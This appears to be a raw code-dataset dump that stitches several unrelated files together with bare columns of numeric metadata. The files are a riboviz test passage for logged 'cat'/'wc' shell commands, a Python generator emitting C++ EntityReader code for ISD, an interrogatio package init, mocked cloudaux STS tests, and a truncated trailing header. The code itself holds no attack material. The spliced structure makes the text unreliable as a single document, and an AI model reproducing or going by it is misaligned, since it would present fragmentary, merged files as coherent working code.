cmd = ["cat", path, "no-such-file.txt", path]
try:
process_utils.run_logged_redirect_command(cmd, tmp_redirect_file, tmp_stderr_file)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"cat: no-such-file.txt: No such file or directory"
def test_run_logged_redirect_command_cmd_file(
tmp_stderr_file, tmp_redirect_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_redirect_command`
using a file to capture standard error and a file to capture
commands sent to the operating system.
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt", path]
try:
process_utils.run_logged_redirect_command(cmd,
tmp_redirect_file,
tmp_stderr_file,
tmp_cmd_file)
except AssertionError:
pass
# Compare path to captured redirect.
with open(path) as expected, open(tmp_redirect_file) as actual:
for line1, line2 in zip(expected, actual):
assert line1 == line2
lines = [line.rstrip('\n') for line in open(tmp_stderr_file)]
assert len(lines) == 1
assert lines[0] == \
"cat: no-such-file.txt: No such file or directory"
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s > %s" % (utils.list_to_str(cmd), tmp_redirect_file)
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_redirect_command_cmd_file_dry_run(
tmp_stderr_file, tmp_redirect_file, tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_redirect_command`
using a file to capture standard error and a file to capture
commands sent to the operating system, with the ``dry_run``
parameter set to ``True``.
:param tmp_stderr_file: Error log file
:type tmp_stderr_file: str or unicode
:param tmp_redirect_file: File for redirected output
:type tmp_redirect_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd = ["cat", path, "no-such-file.txt", path]
process_utils.run_logged_redirect_command(cmd,
tmp_redirect_file,
tmp_stderr_file,
tmp_cmd_file,
True)
with open(tmp_redirect_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_stderr_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s > %s" % (utils.list_to_str(cmd), tmp_redirect_file)
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_pipe_command_log(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
try:
process_utils.run_logged_pipe_command(cmd1, cmd2, tmp_stdout_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == "cat: no-such-file: No such file or directory"
assert str(num_lines * 2) == lines[1] # Output from wc
def test_run_logged_pipe_command_log_cmd_file(tmp_stdout_file,
tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
error and a file to capture commands sent to the operating
system.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
num_lines = len([line for line in open(path)])
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
try:
process_utils.run_logged_pipe_command(cmd1,
cmd2,
tmp_stdout_file,
tmp_cmd_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 2
assert lines[0] == "cat: no-such-file: No such file or directory"
assert str(num_lines * 2) == lines[1] # Output from wc
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s | %s" % (utils.list_to_str(cmd1),
utils.list_to_str(cmd2))
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_pipe_command_log_cmd_file_dry_run(tmp_stdout_file,
tmp_cmd_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
error and a file to capture commands sent to the operating
system, with the ``dry_run`` parameter set to ``True``.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
:param tmp_cmd_file: Command file
:type tmp_cmd_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l"]
process_utils.run_logged_pipe_command(cmd1,
cmd2,
tmp_stdout_file,
tmp_cmd_file,
True)
with open(tmp_stdout_file) as f:
lines = f.readlines()
assert len(lines) == 0
with open(tmp_cmd_file) as f:
actual_cmds = f.readlines()
assert len(actual_cmds) == 1
expected_cmd = "%s | %s" % (utils.list_to_str(cmd1),
utils.list_to_str(cmd2))
assert actual_cmds[0].rstrip('\n') == expected_cmd
def test_run_logged_pipe_command_error(tmp_stdout_file):
"""
Test :py:func:`riboviz.process_utils.run_logged_pipe_command`
using a single file to capture both standard output and standard
    error, where the second command in the pipeline includes an error.
:param tmp_stdout_file: Output log file
:type tmp_stdout_file: str or unicode
"""
path = os.path.realpath(__file__)
cmd1 = ["cat", path, "no-such-file", path]
cmd2 = ["wc", "-l", "-x"]
try:
process_utils.run_logged_pipe_command(cmd1, cmd2, tmp_stdout_file)
except AssertionError:
pass
lines = [line.rstrip('\n') for line in open(tmp_stdout_file)]
assert len(lines) == 3
assert lines[0] == "cat: no-such-file: No such file or directory"
assert lines[1] == "wc: invalid option -- 'x'"
assert lines[2] == "Try 'wc --help' for more information."
| 37.326676
| 90
| 0.641367
| 3,730
| 26,166
| 4.259517
| 0.03807
| 0.048716
| 0.069549
| 0.036254
| 0.965697
| 0.954368
| 0.942913
| 0.924471
| 0.913142
| 0.911631
| 0
| 0.008133
| 0.252847
| 26,166
| 700
| 91
| 37.38
| 0.804552
| 0.287205
| 0
| 0.819753
| 0
| 0
| 0.116225
| 0
| 0
| 0
| 0
| 0
| 0.264198
| 1
| 0.069136
| false
| 0.051852
| 0.012346
| 0
| 0.081481
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
00406ebe1a4d839db58b9ab9e1ec2ee191be1cf5
| 16,983
|
py
|
Python
|
CodeGenerator/Generators/ISD_EntityReader.py
|
Cooolrik/ISD
|
c06afd5a2f4e7d2fe21ba3c77e60595c1bd24ade
|
[
"MIT"
] | null | null | null |
CodeGenerator/Generators/ISD_EntityReader.py
|
Cooolrik/ISD
|
c06afd5a2f4e7d2fe21ba3c77e60595c1bd24ade
|
[
"MIT"
] | null | null | null |
CodeGenerator/Generators/ISD_EntityReader.py
|
Cooolrik/ISD
|
c06afd5a2f4e7d2fe21ba3c77e60595c1bd24ade
|
[
"MIT"
] | null | null | null |
# ISD Copyright (c) 2021 Ulrik Lindahl
# Licensed under the MIT license https://github.com/Cooolrik/ISD/blob/main/LICENSE
import CodeGeneratorHelpers as hlp
def ISD_EntityReader_h():
lines = []
lines.append('// ISD Copyright (c) 2021 Ulrik Lindahl')
lines.append('// Licensed under the MIT license https://github.com/Cooolrik/ISD/blob/main/LICENSE')
lines.append('')
lines.append('#pragma once')
lines.append('')
lines.append('#include "ISD_Types.h"')
lines.append('')
lines.append('namespace ISD')
lines.append(' {')
lines.append(' class MemoryReadStream;')
lines.append('')
lines.append(' class EntityReader')
lines.append(' {')
lines.append(' private:')
lines.append(' MemoryReadStream &sstream;')
lines.append(' const u64 end_position;')
lines.append('')
lines.append(' std::unique_ptr<EntityReader> active_subsection;')
lines.append(' size_t active_subsection_array_size = 0;')
lines.append(' size_t active_subsection_index = ~0;')
lines.append(' u64 active_subsection_end_pos = 0;')
lines.append('')
lines.append(' public:')
lines.append(' EntityReader( MemoryReadStream &_sstream );')
lines.append(' EntityReader( MemoryReadStream &_sstream , const u64 _end_position );')
lines.append('')
lines.append(' // Read a section. ')
lines.append(' // If the section is null, the section is directly closed, nullptr+success is returned ')
lines.append(' // from BeginReadSection, and EndReadSection shall not be called.')
lines.append(' std::tuple<EntityReader *, bool> BeginReadSection( const char *key, const u8 key_length, const bool null_object_is_allowed );')
lines.append(' bool EndReadSection( const EntityReader *section_reader );')
lines.append('')
lines.append(' // Build a sections array. ')
lines.append(' // If the section is null, the section array is directly closed, nullptr+0+success is returned ')
lines.append(' // from BeginReadSectionsArray, and EndReadSectionsArray shall not be called.')
lines.append(' std::tuple<EntityReader *, size_t, bool> BeginReadSectionsArray( const char *key, const u8 key_length, const bool null_object_is_allowed, std::vector<i32> *dest_index = nullptr );')
lines.append(' bool BeginReadSectionInArray( const EntityReader *sections_array_reader , const size_t section_index, bool *dest_section_has_data = nullptr /* if nullptr, object is not allowed to be empty*/ );')
lines.append(' bool EndReadSectionInArray( const EntityReader *sections_array_reader , const size_t section_index );')
lines.append(' bool EndReadSectionsArray( const EntityReader *sections_array_reader );')
lines.append('')
lines.append(' // The Read function template, specifically implemented below for all supported value types.')
lines.append(' template <class T> bool Read( const char *key, const u8 key_length, T &value );')
lines.append('')
# print the base types
for basetype in hlp.base_types:
type_name = 'VT_' + basetype.name
lines.append(' // ' + type_name )
for type_impl in basetype.variants:
type_impl_name = type_impl.implementing_type
lines.append(' template <> bool Read<' + type_impl_name + '>( const char *key, const u8 key_length, ' + type_impl_name + ' &value );')
lines.append(' template <> bool Read<optional_value<' + type_impl_name + '>>( const char *key, const u8 key_length, optional_value<' + type_impl_name + '> &value );')
lines.append('')
# print the array types
for basetype in hlp.base_types:
type_name = 'VT_Array_' + basetype.name
lines.append(' // ' + type_name )
for type_impl in basetype.variants:
type_impl_name = type_impl.implementing_type
lines.append(' template <> bool Read<std::vector<' + type_impl_name + '>>( const char *key, const u8 key_length, std::vector<' + type_impl_name + '> &value );')
lines.append(' template <> bool Read<optional_vector<' + type_impl_name + '>>( const char *key, const u8 key_length, optional_vector<' + type_impl_name + '> &value );')
lines.append(' template <> bool Read<idx_vector<' + type_impl_name + '>>( const char *key, const u8 key_length, idx_vector<' + type_impl_name + '> &value );')
lines.append(' template <> bool Read<optional_idx_vector<' + type_impl_name + '>>( const char *key, const u8 key_length, optional_idx_vector<' + type_impl_name + '> &value );')
lines.append('')
lines.append(' };')
lines.append('')
lines.append(' // Read method. Specialized for all supported value types.')
lines.append(' template <class T> bool EntityReader::Read( const char *key, const u8 key_length, T &value )')
lines.append(' {')
lines.append(' static_assert(false, "Error: EntityReader::Read template: The value type T cannot be serialized.");')
lines.append(' }')
lines.append(' };')
hlp.write_lines_to_file("../ISD/ISD_EntityReader.h",lines)
def ISD_EntityReader_cpp():
lines = []
lines.append('// ISD Copyright (c) 2021 Ulrik Lindahl')
lines.append('// Licensed under the MIT license https://github.com/Cooolrik/ISD/blob/main/LICENSE')
lines.append('')
lines.append('#pragma once')
lines.append('')
lines.append('#include "ISD_EntityReader.h"')
lines.append('#include "ISD_MemoryReadStream.h"')
lines.append('')
lines.append('#include "ISD_EntityReaderTemplates.inl"')
lines.append('')
lines.append('namespace ISD')
lines.append(' {')
lines.append(' EntityReader::EntityReader( MemoryReadStream &_sstream ) : sstream( _sstream ) , end_position( _sstream.GetSize() )')
lines.append(' {')
lines.append(' }')
lines.append('')
lines.append(' EntityReader::EntityReader( MemoryReadStream &_sstream , const u64 _end_position ) : sstream( _sstream ) , end_position( _end_position )')
lines.append(' {')
lines.append(' }')
lines.append('')
# print the base types
for basetype in hlp.base_types:
type_name = 'VT_' + basetype.name
array_type_name = 'VT_Array_' + basetype.name
for type_impl in basetype.variants:
implementing_type = str(type_impl.implementing_type)
item_type = str(type_impl.item_type)
num_items_per_object = str(type_impl.num_items_per_object)
if type_impl.overrides_type:
lines.append(f' // {implementing_type}: using {item_type} to read')
lines.append(f' template <> bool EntityReader::Read<{implementing_type}>( const char *key, const u8 key_length, {implementing_type} &dest_variable )')
lines.append(f' {{')
lines.append(f' {item_type} tmp_variable;')
lines.append(f' if( !this->Read<{item_type}>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' dest_variable = {implementing_type}( tmp_variable );')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: using optional_value<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<optional_value<{implementing_type}>>( const char *key, const u8 key_length, optional_value<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' optional_value<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<optional_value<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' if( tmp_variable.has_value() )')
lines.append(f' dest_variable.set( tmp_variable.value() );')
lines.append(f' else')
lines.append(f' dest_variable.reset();')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: using std::vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<std::vector<{implementing_type}>>( const char *key, const u8 key_length, std::vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' std::vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<std::vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.reserve( tmp_variable.size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.size(); ++i )')
lines.append(f' dest_variable.emplace_back( {implementing_type}(tmp_variable[i]) );')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: optional_vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<optional_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' optional_vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<optional_vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' if( tmp_variable.has_value() )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.values().reserve( tmp_variable.values().size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.values().size(); ++i )')
lines.append(f' dest_variable.values().emplace_back( {implementing_type}(tmp_variable.values()[i]) );')
lines.append(f' }}')
lines.append(f' else')
lines.append(f' {{')
lines.append(f' dest_variable.reset();')
lines.append(f' }}')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: using idx_vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<idx_vector<{implementing_type}>>( const char *key, const u8 key_length, idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' idx_vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<idx_vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' // move index, as no conversion is needed')
lines.append(f' dest_variable.index() = std::move( tmp_variable.index() );')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.values().reserve( tmp_variable.values().size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.values().size(); ++i )')
lines.append(f' dest_variable.values().emplace_back( {implementing_type}(tmp_variable.values()[i]) );')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {implementing_type}: optional_idx_vector<{item_type}> to read' )
lines.append(f' template <> bool EntityReader::Read<optional_idx_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' optional_idx_vector<{item_type}> tmp_variable;')
lines.append(f' if( !this->Read<optional_idx_vector<{item_type}>>( key, key_length , tmp_variable ) )')
lines.append(f' return false;')
lines.append(f'')
lines.append(f' if( tmp_variable.has_value() )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f'')
lines.append(f' // move index, as no conversion is needed')
lines.append(f' dest_variable.index() = std::move( tmp_variable.index() );')
lines.append(f'')
lines.append(f' // copy values. use explicit ctor and emplace, since some objects have private conversion ctors')
lines.append(f' dest_variable.values().reserve( tmp_variable.values().size() );')
lines.append(f' for( size_t i = 0; i < tmp_variable.values().size(); ++i )')
lines.append(f' dest_variable.values().emplace_back( {implementing_type}(tmp_variable.values()[i]) );')
lines.append(f' }}')
lines.append(f' else')
lines.append(f' {{')
lines.append(f' dest_variable.reset();')
lines.append(f' }}')
lines.append(f'')
lines.append(f' return true;')
lines.append(f' }}')
lines.append(f'')
else:
lines.append(f' // {type_name}: {implementing_type}')
lines.append(f' template <> bool EntityReader::Read<{implementing_type}>( const char *key, const u8 key_length, {implementing_type} &dest_variable )')
lines.append(f' {{')
lines.append(f' reader_status status = read_single_item<ValueType::{type_name},{implementing_type}>(this->sstream, key, key_length, false, &(dest_variable) );')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: optional_value<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<optional_value<{implementing_type}>>( const char *key, const u8 key_length, optional_value<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f' reader_status status = read_single_item<ValueType::{type_name},{implementing_type}>(this->sstream, key, key_length, true, &(dest_variable.value()) );')
lines.append(f' if( status == reader_status::success_empty )')
lines.append(f' dest_variable.reset();')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: std::vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<std::vector<{implementing_type}>>( const char *key, const u8 key_length, std::vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, false, &(dest_variable), nullptr );')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: optional_vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<optional_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, true, &(dest_variable.values()), nullptr );')
lines.append(f' if( status == reader_status::success_empty )')
lines.append(f' dest_variable.reset();')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: idx_vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<idx_vector<{implementing_type}>>( const char *key, const u8 key_length, idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, false, &(dest_variable.values()), &(dest_variable.index()) );')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(f' // {type_name}: optional_idx_vector<{implementing_type}>' )
lines.append(f' template <> bool EntityReader::Read<optional_idx_vector<{implementing_type}>>( const char *key, const u8 key_length, optional_idx_vector<{implementing_type}> &dest_variable )')
lines.append(f' {{')
lines.append(f' dest_variable.set();')
lines.append(f' reader_status status = read_array<ValueType::{array_type_name},{implementing_type}>(this->sstream, key, key_length, true, &(dest_variable.values()), &(dest_variable.index()) );')
lines.append(f' if( status == reader_status::success_empty )')
lines.append(f' dest_variable.reset();')
lines.append(f' return status != reader_status::fail;')
lines.append(f' }}')
lines.append(f'')
lines.append(' };')
hlp.write_lines_to_file("../ISD/ISD_EntityReader.cpp",lines)
def run():
ISD_EntityReader_h()
ISD_EntityReader_cpp()
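The CodeGeneratorHelpers module is not shown here; the loops above only assume that hlp.base_types is an iterable of objects carrying a name and a variants list, and that each variant exposes implementing_type, item_type, num_items_per_object and overrides_type. A hypothetical entry illustrating that assumed shape (not the actual ISD type table):
from collections import namedtuple

# Hypothetical stand-ins for the structures CodeGeneratorHelpers provides.
BaseType = namedtuple('BaseType', ['name', 'variants'])
Variant = namedtuple('Variant', ['implementing_type', 'item_type',
                                 'num_items_per_object', 'overrides_type'])

example_base_types = [
    BaseType(name='Vec3', variants=[
        Variant(implementing_type='fvec3', item_type='float',
                num_items_per_object=3, overrides_type=False),
    ]),
]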
| 56.989933
| 222
| 0.676206
| 2,202
| 16,983
| 5.027702
| 0.075386
| 0.242435
| 0.175594
| 0.090597
| 0.877428
| 0.85593
| 0.822419
| 0.809773
| 0.783308
| 0.76172
| 0
| 0.003657
| 0.162692
| 16,983
| 298
| 223
| 56.989933
| 0.774895
| 0.010658
| 0
| 0.664207
| 0
| 0.103321
| 0.625409
| 0.225219
| 0
| 0
| 0
| 0
| 0.00369
| 1
| 0.01107
| false
| 0
| 0.00369
| 0
| 0.01476
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cc64ba8c9040168b08cf2f0761703ce7069fb218
| 208
|
py
|
Python
|
interrogatio/handlers/__init__.py
|
ffaraone/interrogatio
|
8b66e7fe73d14bfda38cc2eb3aecb3291e4afda1
|
[
"BSD-3-Clause"
] | 5
|
2019-02-19T13:10:39.000Z
|
2022-03-04T19:11:04.000Z
|
interrogatio/handlers/__init__.py
|
ffaraone/interrogatio
|
8b66e7fe73d14bfda38cc2eb3aecb3291e4afda1
|
[
"BSD-3-Clause"
] | 11
|
2020-03-24T16:58:41.000Z
|
2021-12-14T10:19:17.000Z
|
interrogatio/handlers/__init__.py
|
ffaraone/interrogatio
|
8b66e7fe73d14bfda38cc2eb3aecb3291e4afda1
|
[
"BSD-3-Clause"
] | 2
|
2019-05-31T08:36:26.000Z
|
2020-12-18T17:58:50.000Z
|
from interrogatio.handlers.base import QHandler # noqa
from interrogatio.handlers.registry import ( # noqa
register, get_instance, get_registered,
)
from interrogatio.handlers.builtins import * # noqa
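The registry module re-exported above is not shown here. As a hedged sketch of the register / get_instance / get_registered pattern these imports suggest (names below are placeholders, not the interrogatio API):
# Minimal alias-to-class registry, assuming handlers are looked up by the
# question's type; the real interrogatio.handlers.registry may differ.
_registry = {}

def sketch_register(alias, handler_class):
    # Map a question-type alias to its handler class.
    _registry[alias] = handler_class

def sketch_get_registered():
    return list(_registry)

def sketch_get_instance(question, *args, **kwargs):
    # Instantiate the handler registered for this question's type.
    handler_class = _registry[question["type"]]
    return handler_class(question, *args, **kwargs)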
| 34.666667
| 55
| 0.788462
| 24
| 208
| 6.75
| 0.541667
| 0.296296
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139423
| 208
| 5
| 56
| 41.6
| 0.905028
| 0.067308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aeb64d63948bbd932197caf9211def73c9432e83
| 3,615
|
py
|
Python
|
cloudaux/tests/aws/test_sts.py
|
Deepak1100/cloudaux
|
322b26b9c47e5f4fcd5cd11fc4aa5fa830c050f9
|
[
"Apache-2.0"
] | 76
|
2017-02-20T21:35:29.000Z
|
2022-02-07T19:21:07.000Z
|
cloudaux/tests/aws/test_sts.py
|
Deepak1100/cloudaux
|
322b26b9c47e5f4fcd5cd11fc4aa5fa830c050f9
|
[
"Apache-2.0"
] | 100
|
2016-11-13T08:36:09.000Z
|
2021-08-11T05:59:18.000Z
|
cloudaux/tests/aws/test_sts.py
|
Deepak1100/cloudaux
|
322b26b9c47e5f4fcd5cd11fc4aa5fa830c050f9
|
[
"Apache-2.0"
] | 43
|
2016-11-13T16:50:40.000Z
|
2021-08-16T21:01:03.000Z
|
"""
.. module: cloudaux.tests.aws.test_sts
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Josafat Gonzalez <josafatg@netflix.com>
"""
from botocore.client import Config
from cloudaux.aws.sts import boto3_cached_conn
from mock import patch
def test_boto3_cached_conn_read_only():
# Arrange
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1',
'read_only': True
}
with patch('boto3.session.Session.client'):
# Act
conn = boto3_cached_conn('s3', **conn_details)
# Assert
assert 'PolicyArns' in conn.assume_role.call_args.kwargs
def test_boto3_cached_conn_default():
# Arrange
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1'
}
with patch('boto3.session.Session.client'):
# Act
conn = boto3_cached_conn('s3', **conn_details)
# Assert
assert 'PolicyArns' not in conn.assume_role.call_args.kwargs
def test_boto3_cached_conn_retry_config(sts):
from cloudaux.aws.sts import _client
import cloudaux.aws.sts
def mock_client(*args, **kwargs):
with patch('boto3.session.Session') as p:
_client(*args, **kwargs)
return p
# With the default:
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3')
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 10}
cloudaux.aws.sts.CACHE = {}
# With STS role assumption:
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1'
}
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', **conn_details)
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 10}
cloudaux.aws.sts.CACHE = {}
# With a specified retry Config:
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', retry_max_attempts=1000)
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 1000}
cloudaux.aws.sts.CACHE = {}
# With STS role assumption:
conn_details['retry_max_attempts'] = 1000
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', **conn_details)
assert conn.mock_calls[1].kwargs['config'].retries == {'max_attempts': 1000}
cloudaux.aws.sts.CACHE = {}
def test_boto3_cached_conn_config(sts):
from cloudaux.aws.sts import _client
import cloudaux.aws.sts
def mock_client(*args, **kwargs):
with patch('boto3.session.Session') as p:
_client(*args, **kwargs)
return p
# With the default:
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', config=Config(signature_version='s3v4'))
assert conn.mock_calls[1].kwargs['config'].signature_version == 's3v4'
cloudaux.aws.sts.CACHE = {}
# With STS role assumption:
conn_details = {
'account_number': '111111111111',
'assume_role': 'role_one',
'region': 'us-east-1'
}
with patch('cloudaux.aws.sts._client', mock_client):
conn = boto3_cached_conn('s3', config=Config(signature_version='s3v4'), **conn_details)
assert conn.mock_calls[1].kwargs['config'].signature_version == 's3v4'
cloudaux.aws.sts.CACHE = {}
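For reference, a minimal sketch of the botocore Config objects the assertions above expect the session client to be created with; how cloudaux builds or merges them internally is not shown here and is assumed:
from botocore.client import Config

# Default retry behaviour asserted above.
default_retry_config = Config(retries={'max_attempts': 10})
# Caller-specified retry_max_attempts.
custom_retry_config = Config(retries={'max_attempts': 1000})
# A user-supplied Config merged with the retry default (merge assumed).
merged_config = Config(signature_version='s3v4',
                       retries={'max_attempts': 10})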
| 31.710526
| 95
| 0.6426
| 451
| 3,615
| 4.929047
| 0.179601
| 0.084121
| 0.107063
| 0.068376
| 0.853351
| 0.822762
| 0.822762
| 0.822762
| 0.822762
| 0.817814
| 0
| 0.040925
| 0.222683
| 3,615
| 113
| 96
| 31.99115
| 0.750178
| 0.114799
| 0
| 0.71831
| 0
| 0
| 0.202766
| 0.076077
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0.084507
| false
| 0
| 0.098592
| 0
| 0.211268
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aef63c24ef0d01a8655e8af8758804242bac0963
| 3,485
|
py
|
Python
|
papers/ICCV2021-NGC/configs/_updater.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 69
|
2021-11-01T11:18:13.000Z
|
2022-03-28T04:27:17.000Z
|
papers/ICCV2021-NGC/configs/_updater.py
|
huang-ziyuan/EssentialMC2
|
